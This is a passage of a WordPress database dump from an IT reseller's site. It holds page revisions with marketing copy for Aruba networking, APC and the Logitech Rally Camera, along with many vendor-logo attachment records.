src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Centralized network operations.</h2>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Resolve network issues â€“ before they disrupt your business.</h2>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-11 16:43:06','2018-12-11 08:43:06','',1440,'https://bintara.com.my/blog/2018/12/11/1440-revision-v1/',0,'revision','',0),(1658,1,'2018-12-11 16:44:10','2018-12-11 08:44:10','<h1>NETWORKING PRODUCTS</h1>\r\n&nbsp;\r\n<div class=\"subheadline\">\r\n<h2>Smarter solutions for experience-driven networking.</h2>\r\n&nbsp;\r\n\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wireless access you can always count on.</h2>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wired networking thatâ€™s a whole lot smarter.</h2>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h2>Visibility and control for your WAN.</h2>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Protect your organization, from inside and out.</h2>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Centralized network operations.</h2>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Resolve network issues â€“ before they disrupt your business.</h2>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-11 16:44:10','2018-12-11 08:44:10','',1440,'https://bintara.com.my/blog/2018/12/11/1440-revision-v1/',0,'revision','',0),(2112,1,'2018-12-14 00:02:00','2018-12-13 16:02:00','<h3><img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />Aruba NETWORKING PRODUCTS</h3>\r\n<div class=\"subheadline\">\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<h3></h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-14 00:02:00','2018-12-13 16:02:00','',1440,'https://bintara.com.my/blog/2018/12/14/1440-revision-v1/',0,'revision','',0),(1661,1,'2018-12-11 16:46:49','2018-12-11 08:46:49','<h1><img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" /></h1>\r\n<h1>NETWORKING PRODUCTS</h1>\r\n&nbsp;\r\n<div class=\"subheadline\">\r\n<h2>Smarter solutions for experience-driven networking.</h2>\r\n&nbsp;\r\n\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wireless access you can always count on.</h2>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wired networking thatâ€™s a whole lot smarter.</h2>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h2>Visibility and control for your WAN.</h2>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Protect your organization, from inside and out.</h2>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Centralized network operations.</h2>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Resolve network issues â€“ before they disrupt your business.</h2>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n[maxbutton id=\"1\" ]','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-11 16:46:49','2018-12-11 08:46:49','',1440,'https://bintara.com.my/blog/2018/12/11/1440-revision-v1/',0,'revision','',0),(1793,1,'2018-12-12 11:29:08','2018-12-12 03:29:08','<img class=\" wp-image-1657 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/apc-malaysia-distributor.jpg\" alt=\"\" width=\"343\" height=\"185\" />\r\n\r\n&nbsp;','APC','','inherit','closed','closed','','1438-revision-v1','','','2018-12-12 11:29:08','2018-12-12 03:29:08','',1438,'https://bintara.com.my/blog/2018/12/12/1438-revision-v1/',0,'revision','',0),(1662,1,'2018-12-11 16:58:18','2018-12-11 08:58:18','<img class=\" wp-image-1657 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/apc-malaysia-distributor.jpg\" alt=\"\" width=\"343\" height=\"185\" />\r\n\r\nIn todayâ€™s connected world, you deserve integrated solutions for the transformation of IT. Our proven industry leadership, combined with the largest community of IT partners, has resulted in collaborative technology that delivers connectivity, reliability, and accessibility through simplified delivery and expert services.\r\n\r\n&nbsp;','APC','','inherit','closed','closed','','1438-revision-v1','','','2018-12-11 16:58:18','2018-12-11 08:58:18','',1438,'https://bintara.com.my/blog/2018/12/11/1438-revision-v1/',0,'revision','',0),(2886,1,'2019-02-13 16:43:18','2019-02-13 08:43:18','','Logitech Rally Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-02-13 16:43:18','2019-02-13 08:43:18','',2885,'https://bintara.com.my/blog/2019/02/13/2885-revision-v1/',0,'revision','',0),(2888,1,'2019-02-13 16:46:08','2019-02-13 08:46:08','<h3>Rally Camera</h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Advanced optics frame every participant with amazing clarity</li><li>Sleek industrial design for any professional meeting space</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />','Logitech Rally Camera','','inherit','closed','closed','','2885-revision-v1','','','2019-02-13 16:46:08','2019-02-13 08:46:08','',2885,'https://bintara.com.my/blog/2019/02/13/2885-revision-v1/',0,'revision','',0),(1668,1,'2018-12-11 17:11:08','2018-12-11 09:11:08','APC Logo','APC Logo','APC Logo','inherit','closed','closed','','apc-logo','','','2018-12-12 09:51:24','2018-12-12 01:51:24','',1329,'https://bintara.com.my/wp-content/uploads/2018/12/APC-Logo.jpg',0,'attachment','image/jpeg',0),(1669,1,'2018-12-11 17:11:09','2018-12-11 09:11:09','Autodesk','Autodesk','Autodesk','inherit','closed','closed','','autodesk-3','','','2018-12-12 09:49:28','2018-12-12 01:49:28','',1344,'https://bintara.com.my/wp-content/uploads/2018/12/Autodesk.jpg',0,'attachment','image/jpeg',0),(1670,1,'2018-12-11 17:11:12','2018-12-11 09:11:12','Barracuda Logo','Barracuda Logo','Barracuda Logo','inherit','closed','closed','','barracuda-logo','','','2018-12-12 09:47:55','2018-12-12 01:47:55','',1345,'https://bintara.com.my/wp-content/uploads/2018/12/Barracuda-Logo.jpg',0,'attachment','image/jpeg',0),(1671,1,'2018-12-11 17:11:15','2018-12-11 09:11:15','Bitdefender logo','Bitdefender logo','Bitdefender logo','inherit','closed','closed','','bitdefender-logo','','','2018-12-12 09:45:58','2018-12-12 01:45:58','',1353,'https://bintara.com.my/wp-content/uploads/2018/12/Bitdefender-logo.jpg',0,'attachment','image/jpeg',0),(1672,1,'2018-12-11 17:11:16','2018-12-11 09:11:16','Cisco Logo','Cisco Logo','Cisco Logo','inherit','closed','closed','','cisco-logo','','','2018-12-12 09:42:59','2018-12-12 01:42:59','',1363,'https://bintara.com.my/wp-content/uploads/2018/12/Cisco-Logo.jpg',0,'attachment','image/jpeg',0),(1673,1,'2018-12-11 17:11:18','2018-12-11 09:11:18','Dell Logo','Dell Logo','Dell Logo','inherit','closed','closed','','dell-logo','','','2018-12-12 09:41:11','2018-12-12 01:41:11','',1370,'https://bintara.com.my/wp-content/uploads/2018/12/Dell-Logo.jpg',0,'attachment','image/jpeg',0),(1674,1,'2018-12-11 17:11:22','2018-12-11 09:11:22','Dropbox logo','Dropbox logo','Dropbox logo','inherit','closed','closed','','dropbox-logo','','','2018-12-12 09:37:38','2018-12-12 01:37:38','',1375,'https://bintara.com.my/wp-content/uploads/2018/12/Dropbox-logo.jpg',0,'attachment','image/jpeg',0),(1675,1,'2018-12-11 17:11:25','2018-12-11 09:11:25','Epson Logo','Epson Logo','Epson Logo','inherit','closed','closed','','epson-logo','','','2018-12-12 09:34:15','2018-12-12 01:34:15','',1376,'https://bintara.com.my/wp-content/uploads/2018/12/Epson-Logo.jpg',0,'attachment','image/jpeg',0),(1676,1,'2018-12-11 17:11:27','2018-12-11 09:11:27','ergotron logo','ergotron logo','ergotron logo','inherit','closed','closed','','ergotron-logo','','','2018-12-12 09:32:00','2018-12-12 01:32:00','',1378,'https://bintara.com.my/wp-content/uploads/2018/12/ergotron-logo.jpg',0,'attachment','image/jpeg',0),(1677,1,'2018-12-11 17:11:30','2018-12-11 09:11:30','Fortinet Logo','Fortinet Logo','Fortinet Logo','inherit','closed','closed','','fortinet-logo','','','2018-12-12 09:26:20','2018-12-12 01:26:20','',1382,'https://bintara.com.my/wp-content/uploads/2018/12/Fortinet-Logo.jpg',0,'attachment','image/jpeg',0),(1678,1,'2018-12-11 17:11:32','2018-12-11 09:11:32','GoToMeeting','GoToMeeting','GoToMeeting','inherit','closed','closed','','gotomeeting-2','','','2018-12-12 15:29:25','2018-12-12 07:29:25','',1631,'https://bintara.com.my/wp-content/uploads/2018/12/GoToMeeting.jpg',0,'attachment','image/jpeg',0),(1679,1,'2018-12-11 17:11:36','2018-12-11 09:11:36','GoToTraining','GoToTraining','GoToTraining','inherit','closed','closed','','gototraining-2','','','2018-12-12 15:31:25','2018-12-12 07:31:25','',1636,'https://bintara.com.my/wp-content/uploads/2018/12/GoToTraining.jpg',0,'attachment','image/jpeg',0),(1680,1,'2018-12-11 17:11:38','2018-12-11 09:11:38','','GoToWebinar','','inherit','closed','closed','','gotowebinar-2','','','2018-12-12 15:30:47','2018-12-12 07:30:47','',1635,'https://bintara.com.my/wp-content/uploads/2018/12/GoToWebinar.jpg',0,'attachment','image/jpeg',0),(1681,1,'2018-12-11 17:11:41','2018-12-11 09:11:41','HP Logo V2','HP Logo V2','HP Logo V2','inherit','closed','closed','','hp-logo-v2','','','2018-12-12 09:58:48','2018-12-12 01:58:48','',1385,'https://bintara.com.my/wp-content/uploads/2018/12/HP-Logo-V2.jpg',0,'attachment','image/jpeg',0),(1682,1,'2018-12-11 17:11:43','2018-12-11 09:11:43','Jabra Logo','Jabra Logo','Jabra Logo','inherit','closed','closed','','jabra-logo','','','2018-12-12 09:59:54','2018-12-12 01:59:54','',1393,'https://bintara.com.my/wp-content/uploads/2018/12/Jabra-Logo.jpg',0,'attachment','image/jpeg',0),(1683,1,'2018-12-11 17:11:44','2018-12-11 09:11:44','Juniper Logo','Juniper Logo','Juniper Logo','inherit','closed','closed','','juniper-logo','','','2018-12-12 10:00:57','2018-12-12 02:00:57','',1394,'https://bintara.com.my/wp-content/uploads/2018/12/Juniper-Logo.jpg',0,'attachment','image/jpeg',0),(1684,1,'2018-12-11 17:11:46','2018-12-11 09:11:46','','Kaspersky Logo','','inherit','closed','closed','','kaspersky-logo','','','2018-12-11 17:11:46','2018-12-11 09:11:46','',0,'https://bintara.com.my/wp-content/uploads/2018/12/Kaspersky-Logo.jpg',0,'attachment','image/jpeg',0),(1685,1,'2018-12-11 17:11:47','2018-12-11 09:11:47','Kingston Logo','Kingston Logo','Kingston Logo','inherit','closed','closed','','kingston-logo','','','2018-12-12 10:02:57','2018-12-12 02:02:57','',1396,'https://bintara.com.my/wp-content/uploads/2018/12/Kingston-Logo.jpg',0,'attachment','image/jpeg',0),(1688,1,'2018-12-11 17:11:55','2018-12-11 09:11:55','','logmein-rescue2','','inherit','closed','closed','','logmein-rescue2','','','2018-12-11 17:11:55','2018-12-11 09:11:55','',0,'https://bintara.com.my/wp-content/uploads/2018/12/logmein-rescue2.png',0,'attachment','image/png',0),(1716,1,'2018-12-11 17:19:15','2018-12-11 09:19:15','Acer Logo','Acer Logo','Acer Logo','inherit','closed','closed','','acer-logo','','','2018-12-12 09:54:22','2018-12-12 01:54:22','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Acer-Logo.jpg',0,'attachment','image/jpeg',0),(1690,1,'2018-12-11 17:27:29','2018-12-11 09:27:29','[vfb id=2]','Get Quotation (Logitech)','','publish','closed','closed','','get-quotation-logitech','','','2018-12-13 22:32:10','2018-12-13 14:32:10','',0,'https://bintara.com.my/?page_id=1690',0,'page','',0),(1691,1,'2018-12-11 17:16:55','2018-12-11 09:16:55','Kaspersky Logo','Kaspersky Logo','Kaspersky Logo','inherit','closed','closed','','kaspersky-logo-2','','','2018-12-12 10:01:58','2018-12-12 02:01:58','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Kaspersky-Logo-1.jpg',0,'attachment','image/jpeg',0),(1693,1,'2018-12-11 17:17:00','2018-12-11 09:17:00','Lenovo Logo','Lenovo Logo','Lenovo Logo','inherit','closed','closed','','lenovo-logo-2','','','2018-12-12 10:03:44','2018-12-12 02:03:44','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Lenovo-Logo-1.jpg',0,'attachment','image/jpeg',0),(1694,1,'2018-12-11 17:17:03','2018-12-11 09:17:03','Logitech Logo','Logitech Logo','Logitech Logo','inherit','closed','closed','','logitech-logo-2','','','2018-12-12 10:05:56','2018-12-12 02:05:56','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Logitech-Logo-1.jpg',0,'attachment','image/jpeg',0),(1696,1,'2018-12-11 17:17:07','2018-12-11 09:17:07','Logo Adobe','Logo Adobe','Logo Adobe','inherit','closed','closed','','logo-adobe-2','','','2018-12-12 09:52:50','2018-12-12 01:52:50','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Logo-Adobe-1.jpg',0,'attachment','image/jpeg',0),(1697,1,'2018-12-11 17:17:09','2018-12-11 09:17:09','Logo TV','Logo TV','Logo TV','inherit','closed','closed','','logo-tv','','','2018-12-12 10:19:15','2018-12-12 02:19:15','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Logo-TV.jpg',0,'attachment','image/jpeg',0),(1698,1,'2018-12-11 17:17:12','2018-12-11 09:17:12','Logo TV','Logo Veeam','Logo TV','inherit','closed','closed','','logo-veeam','','','2018-12-12 10:20:11','2018-12-12 02:20:11','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Logo-Veeam.jpg',0,'attachment','image/jpeg',0),(1699,1,'2018-12-11 17:17:14','2018-12-11 09:17:14','McAfee Logo','McAfee Logo','McAfee Logo','inherit','closed','closed','','mcafee-logo','','','2018-12-11 17:50:16','2018-12-11 09:50:16','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/McAfee-Logo.jpg',0,'attachment','image/jpeg',0),(1700,1,'2018-12-11 17:17:15','2018-12-11 09:17:15','Microsoft Logo','Microsoft Logo','Microsoft Logo','inherit','closed','closed','','microsoft-logo','','','2018-12-12 10:09:42','2018-12-12 02:09:42','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Microsoft-Logo.jpg',0,'attachment','image/jpeg',0),(1701,1,'2018-12-11 17:17:19','2018-12-11 09:17:19','NetApp Logo','NetApp Logo','NetApp Logo','inherit','closed','closed','','netapp-logo','','','2018-12-12 10:51:14','2018-12-12 02:51:14','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/NetApp-Logo.jpg',0,'attachment','image/jpeg',0),(1702,1,'2018-12-11 17:17:21','2018-12-11 09:17:21','','OpenVoice Logo','','inherit','closed','closed','','openvoice-logo','','','2018-12-11 17:17:21','2018-12-11 09:17:21','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/OpenVoice-Logo.jpg',0,'attachment','image/jpeg',0),(1703,1,'2018-12-11 17:17:23','2018-12-11 09:17:23','Palo Alto','Palo Alto','Palo Alto','inherit','closed','closed','','palo-alto','','','2018-12-12 10:11:46','2018-12-12 02:11:46','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Palo-Alto.jpg',0,'attachment','image/jpeg',0),(1704,1,'2018-12-11 17:17:25','2018-12-11 09:17:25','RedhatLogo','RedhatLogo','RedhatLogo','inherit','closed','closed','','redhatlogo','','','2018-12-12 10:13:34','2018-12-12 02:13:34','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/RedhatLogo.jpg',0,'attachment','image/jpeg',0),(1705,1,'2018-12-11 17:17:27','2018-12-11 09:17:27','','Rescue Logo','','inherit','closed','closed','','rescue-logo','','','2018-12-11 17:17:27','2018-12-11 09:17:27','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Rescue-Logo.jpg',0,'attachment','image/jpeg',0),(1706,1,'2018-12-11 17:17:30','2018-12-11 09:17:30','Ruckus Authorised Reseller','Ruckus','Ruckus Authorised Reseller','inherit','closed','closed','','ruckus-logo','','','2018-12-11 17:25:40','2018-12-11 09:25:40','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/ruckus-logo.jpg',0,'attachment','image/jpeg',0),(1707,1,'2018-12-11 17:17:31','2018-12-11 09:17:31','Samsung Logo','Samsung Logo','Samsung Logo','inherit','closed','closed','','samsung-logo','','','2018-12-12 10:15:55','2018-12-12 02:15:55','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Samsung-Logo.jpg',0,'attachment','image/jpeg',0),(1708,1,'2018-12-11 17:17:35','2018-12-11 09:17:35','','Sangfor Logo','','inherit','closed','closed','','sangfor-logo','','','2018-12-11 17:17:35','2018-12-11 09:17:35','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Sangfor-Logo.jpg',0,'attachment','image/jpeg',0),(1709,1,'2018-12-11 17:17:37','2018-12-11 09:17:37','Seagate Logo','Seagate Logo','Seagate Logo','inherit','closed','closed','','seagate-logo','','','2018-12-12 10:17:07','2018-12-12 02:17:07','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Seagate-Logo.jpg',0,'attachment','image/jpeg',0),(1710,1,'2018-12-11 17:17:39','2018-12-11 09:17:39','','Shopify Logo','','inherit','closed','closed','','shopify-logo','','','2018-12-11 17:17:39','2018-12-11 09:17:39','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Shopify-Logo.jpg',0,'attachment','image/jpeg',0),(1711,1,'2018-12-11 17:17:42','2018-12-11 09:17:42','Veritas Logo','Veritas Logo','Veritas Logo','inherit','closed','closed','','veritas-logo','','','2018-12-12 10:20:52','2018-12-12 02:20:52','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Veritas-Logo.jpg',0,'attachment','image/jpeg',0),(1712,1,'2018-12-11 17:17:43','2018-12-11 09:17:43','[vfb id=2]','Get Quotation (Logitech)','','inherit','closed','closed','','1690-revision-v1','','','2018-12-11 17:17:43','2018-12-11 09:17:43','',1690,'https://bintara.com.my/blog/2018/12/11/1690-revision-v1/',0,'revision','',0),(1713,1,'2018-12-11 17:17:45','2018-12-11 09:17:45','','VMWARE logo','','inherit','closed','closed','','vmware-logo','','','2018-12-11 17:17:45','2018-12-11 09:17:45','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/VMWARE-logo.jpg',0,'attachment','image/jpeg',0),(1714,1,'2018-12-11 17:17:47','2018-12-11 09:17:47','Wacom logo','Wacom logo','Wacom logo','inherit','closed','closed','','wacom-logo','','','2018-12-12 10:22:51','2018-12-12 02:22:51','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Wacom-logo.jpg',0,'attachment','image/jpeg',0),(1715,1,'2018-12-11 17:17:50','2018-12-11 09:17:50','Zebra Logo','Zebra Logo','Zebra Logo','inherit','closed','closed','','zebra-logo','','','2018-12-12 10:24:02','2018-12-12 02:24:02','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Zebra-Logo.jpg',0,'attachment','image/jpeg',0),(1717,1,'2018-12-11 17:19:17','2018-12-11 09:19:17','','OpenVoice Logo','','inherit','closed','closed','','openvoice-logo-2','','','2018-12-11 17:19:17','2018-12-11 09:19:17','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/OpenVoice-Logo.png',0,'attachment','image/png',0),(1718,1,'2018-12-11 17:19:20','2018-12-11 09:19:20','','Symantec Logo','','inherit','closed','closed','','symantec-logo','','','2018-12-11 17:19:20','2018-12-11 09:19:20','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Symantec-Logo.jpg',0,'attachment','image/jpeg',0),(1719,1,'2018-12-11 17:19:23','2018-12-11 09:19:23','Toughbook Logo V2','Toughbook Logo V2','Toughbook Logo V2','inherit','closed','closed','','toughbook-logo-v2','','','2018-12-12 10:12:35','2018-12-12 02:12:35','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Toughbook-Logo-V2.jpg',0,'attachment','image/jpeg',0),(1720,1,'2018-12-11 17:19:25','2018-12-11 09:19:25','','Trend Micro Logo','','inherit','closed','closed','','trend-micro-logo','','','2018-12-11 17:19:25','2018-12-11 09:19:25','',1429,'https://bintara.com.my/wp-content/uploads/2018/12/Trend-Micro-Logo.jpg',0,'attachment','image/jpeg',0),(2889,1,'2019-02-13 16:47:08','2019-02-13 08:47:08','<h3>Rally Camera</h3><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control.</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Advanced optics frame every participant with amazing clarity</li><li>Sleek industrial design for any professional meeting space</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>Peerless Performance. Exceptional Versatility.</h3><p><br />With premium industrial design and an Ultra-HD imaging system, Rally Camera tops the lineup of standalone video cameras from LogitechÂ®. Packed with advanced optics and breakthrough technologies, Rally Camera delivers premium performance in professional meeting spaces of all shapes and sizes. With whisper-quiet mechanical Pan/Tilt/Zoom, razor-sharp 15X HD zoom, expansive 90Â° field of view, and powerful 4K sensor, Rally Camera captures every person in the room with truly phenomenal video quality.</p>','Logitech Rally 